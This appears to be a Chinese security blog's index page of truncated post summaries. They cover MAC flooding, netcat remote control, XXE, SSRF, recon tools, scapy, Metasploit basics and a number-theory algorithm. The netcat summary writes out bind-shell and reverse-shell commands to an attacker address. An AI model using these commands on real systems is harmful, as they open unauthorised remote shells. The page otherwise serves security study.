略略略

摘要： 扩展欧几里得算法 已知整数a、b，扩展欧几里得算法可以在求得a、b的最大公约数的同时，能找到整数x、y，使它们满足贝祖等式：ax+by=gcd(a,b) 为什么一定存在贝祖等式呢，裴蜀定理如下： 设存在x，y使ax+by=d，d是ax+by取值中的最小正整数，d≠1。再设am+bn=e，则e≥d . 阅读全文

摘要： mac地址泛洪攻击 原理：传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口，一旦在查询过程中无法找到相关的目的MAC对应的条目，此数据帧将作为广播帧来处理，CAM表的容量有限，只能存储不多的条目，当CAM表记录的MAC地址达到上限时，新的条目将不会添加到CAM表中。 基于以上原理 阅读全文

摘要： nc的使用 远程控制 A:靶机 B:攻击机 正向： A：nc lp 333 c bash ；也可以用 e cmd.exe或者 e /bin/bash B：nc 1.1.1.1 333 反向： B：nc lp 333 A：nc 1.1.1.1 333 c bash 注：Windows⽤用户把bash改 阅读全文

摘要： XXE(xml外部实体注入漏洞) xml实体分为4种，分别是内部实体、参数实体、预定义实体和外部实体 内部实体： 在 DTD 或内部子集（即文档中 <!DOCTYPE 语句的一部分）中声明，在文档中用作引用。在 XML 文档解析过程中，实体引用将由它的表示替代。 预定义实体： | 实体 | 描述 | 阅读全文

摘要： 0x00 whois信息收集 http://whois.chinaz.com/ ip查询 https://site.ip138.com/ ip定位 https://www.opengps.cn子域名爆破 https://phpinfo.me/domain/ 端口扫描namp、masscan等还有御剑 阅读全文

摘要： windows文件命名特性利用 0x00 windows不能以以下这些名字命名文件或文件夹: aux、com1、com2、prn、con、nul，因为这些名称都属于设备名称，等价于DOS设备，但我们可以通过cmd来创建这样的文件 \ 注意文件夹名例如aux.txt也是不行的，如果通过cmd命令创建了 阅读全文

摘要： SSRF(Server Side Request Forgery)(服务请求伪造): 是一种由攻击者构造，从而让服务端发起请求的一种安全漏洞，它将一个可以发起网络请求的服务当作跳板来攻击其他服务，SSRF的攻击目标一般是内网。 ssrf的危害 1. 可以对外网、服务器所在内网、本地进行端口扫描，获取 阅读全文

摘要： scapy模块分析数据包 scapy是python写的一个功能强大的交互式数据包处理程序，可用来发送、嗅探、解析和伪造网络数据包，常常被用到网络攻击和测试中。 (网上抄的介绍...) https://scapy.readthedocs.io/en/latest/usage.html starting 阅读全文

摘要： python 安装Crypto时出现的错误:NomodulenamedCrypto.Cipher 首先直接pip install Crypto 这时会在lib/site packages/ 文件夹下生成crypto文件夹，将其重命名为Crypto ...然而这个文件夹下没有Cipher模块，还需要p 阅读全文

摘要： metasploit 启动终端 msfconsole help metasploit命令 tab 可以补全命令，文件之类的 search xxx show exploits\payloads\auxiliary\name info 展示出制定渗透攻击或模块的相关信息 use name 装载一个渗透攻 阅读全文